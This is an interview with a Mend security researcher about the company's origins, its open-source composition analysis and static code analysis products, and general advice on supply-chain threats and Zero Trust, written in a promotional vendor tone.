Cybernews/ Mend: It’s No Longer a Matter of ‘If’, but ‘When’ an Organization Will Be Targeted by Threat Actors
From ransomware and viruses to data breaches, there are many types of security threats to look out for. Because they’re becoming more complex, it’s getting more difficult to secure your organization and avoid the financial and reputational consequences.
While some organizations use traditional security measures, such as encrypting data or using antivirus software, businesses should also take a look at more advanced solutions, such as open source security and license management services.
For this reason, to discuss the right security measures for companies, we invited Daniel Elkabes, the lead security researcher at Mend – a company that specializes in application security.
How did the idea of Mend originate? What has your journey been like so far?
Mend was founded in 2008 when our founders were about to sell their previous company, Eurekify. The buyers of the company asked for a software inventory and security scan, which turned out to be a nightmare to do because the process wasn’t automated. It was time-consuming, expensive, and riddled with potential errors. From there, the founders decided to design a solution to automate all tasks around the use and security of open source components in order to save others from facing the same challenges they did.
Since the company’s inception, we’ve had a number of exciting milestones, including acquiring Diffend, an open source malware security and threat detection solution; launching Mend Cure, the first-ever security auto-remediation application designed for custom code; and entering into the SAST (static application security testing) market.
Can you tell us a little bit about what you do? What issues do your products help solve?
As a pioneer of software composition analysis (SCA), Mend helps organizations secure their code by detecting vulnerabilities and fixing them. Our technology easily integrates into the developer’s workflow, protecting organizations against the most critical vulnerabilities while reducing risk and increasing the productivity of security and development teams.
What technology do you use to detect and eliminate threats before it is too late?
We have two products:
- Our SCA solution continuously scans dozens of open source repositories and cross-references this data with open source components in an organization’s build. It enables the identification of open source components (including transitive dependencies) and has automated remediation.
- Our SAST solution provides custom code vulnerability detection and prioritization, which enables developers to quickly and easily identify the most significant software risks in their proprietary code.
Do you think the recent global events are going to alter the ways in which threat actors operate?
The threat landscape is changing daily, and attackers are becoming increasingly sophisticated. We’ve seen this play out with major incidents like SolarWinds, Colonial Pipeline, Log4j, and more. Global geopolitical events will likely further impact the severity of these attacks, and organizations need to be ready.
What measures should organizations and individuals implement to combat these new threats?
Organizations can take the following steps to combat new threats:
- Identify all the vulnerabilities that exist across their IT ecosystems
- Evaluate the risks they pose and how to manage them
- Prioritize these risks and determine the best approach, whether that is remediation, mitigation, or no action at all
- Consistently run reports to help your security team comply with your organization’s risk management KPIs as well as regulatory requirements
In your opinion, which industries should be especially attentive when it comes to application security?
It is no longer a matter of if an organization will be targeted by threat actors – it’s a matter of when. All organizations, no matter the industry, should be taking precautions to protect against these risks and arming their employees with the necessary tools.
How do cybercriminals take advantage of unprotected code? What is the worst that can happen?
A threat actor could potentially plant nefarious code into a third-party package. If an unsuspecting victim then uses the software that depends on the vulnerable package, their system can become compromised. For example, a recent report we published found more than 1,300 malicious npm packages were responsible for stealing credentials and crypto, as well as for running botnets and collecting host information from machines on which they were installed. It’s vital for developers to understand what attackers are doing and how to remediate issues without slowing down the development process.
Besides application security, what other best practices do you think every organization should follow to secure their operations?
At a higher level, organizations should look to implement a Zero Trust security model. Zero Trust is a proactive approach that requires every request – whether it comes from inside or outside the corporate network – to be authenticated, authorized, and continuously validated before being allowed to access resources and data. Having a Zero Trust framework in place can help mitigate supply chain vulnerabilities and better secure your organization from bad actors.
What does the future hold for Mend?
We have a lot of exciting things in the works over the coming months that we will share with you soon. Stay tuned!